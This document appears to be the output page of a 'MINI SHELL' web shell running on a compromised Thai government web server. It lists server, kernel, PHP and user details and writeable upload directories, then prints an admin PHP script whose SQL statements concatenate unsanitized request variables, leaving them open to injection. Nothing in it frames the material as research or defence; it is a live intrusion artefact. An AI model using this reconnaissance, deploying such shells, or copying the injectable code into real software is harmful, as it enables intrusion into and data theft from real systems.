MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_vc/report/pdir/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_vc/report/pdir/admin/officer_add_admin.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>POC MyAdmin</title>
<META http-equiv=Content-Type content="text/html; charset=windows-874">
<? 
 include ("../../../inc/conndb.inc.php");
 
	echo "<center><br><br><br> ";
	$flag_void  = ""  ; 

	$th_name =trim($th_name)  ;
	$sql_check = "select * from  office_detail where   th_name like '$th_name' ";
	$query_result_ch = mysql_db_query($dbname,$sql_check)  ;
	if (mysql_num_rows($query_result_ch)){
			$flag_void  = "no"  ;   
			 echo "<strong>$th_name </strong><br>ได้ถูกบันทึกในฐานข้อมูลแล้ว  <br> <br>";  
	}else {
			if ( trim($th_name) =="" ) { echo "กรุณา้กรอกชื่อหน่วยงาน<br>";  $flag_void  = "no"  ;                    }
			if ( trim($th_address) =="" ) { echo "กรุณา้กรอกที่ตั้ง<br>";      $flag_void  = "no"  ;                    }
			if ( trim($tel1) =="" ) { echo "กรุณา้กรอกเบอร์โทรศัพท์<br>";    $flag_void  = "no"  ;                    }		
	}	
	if ($flag_void != ""){
	//echo "<a href='officer_add_form_admin.php' onclick = history.back();>ยอนกลับ</a>"; die; 
	echo "<a href='#' onclick = history.go(-1);>ย้อนกลับ</a>"; die; 
	echo "</center>"; 
 }    

if ($banner != "") {
		$image_banner = addslashes(fread(fopen($banner, "r"), filesize($banner)));
		$banner_field = " , banner , banner_type   ";  $image_banner = "  ,  '$image_banner'  ,  '$banner_type' " ;
} 
if ($map != "") {		
		$image_map = addslashes(fread(fopen($map, "r"), filesize($map))); 
		$map_field = " , map , map_type " ;   $image_map = "  ,  '$image_map' , '$map_type' " ;
}

 $sql = " INSERT INTO office_detail (id, th_name,  en_name,  th_address,  
 		en_address,  tel1,  tel2,  tel3,  FX , organiztion_id,  web,  email1,  email2  $banner_field  $map_field)   ";
 $sql = $sql . " VALUES ('', '$th_name',  '$en_name',  '$th_address',  '$en_address', 
 		'$tel1',  '$tel2',  '$tel3',  '$FX', '$organiztion_id',  '$web',  '$email1',  '$email2'   $image_banner  $image_map )   ";

if (!($query_result = mysql_db_query($dbname,$sql))){
	 echo mysql_error();die;
}
//==============================================================================
//echo $sql;
 //die;
?>

<script  language="javascript">
//function updateManiPage(){
	opener.document.location.reload();	
    window.close();
//}
</script>
<meta http-equiv="refresh" content="0;URL=officer.php">
</head>
<body>
</body>
</html>

Anon7 - 2021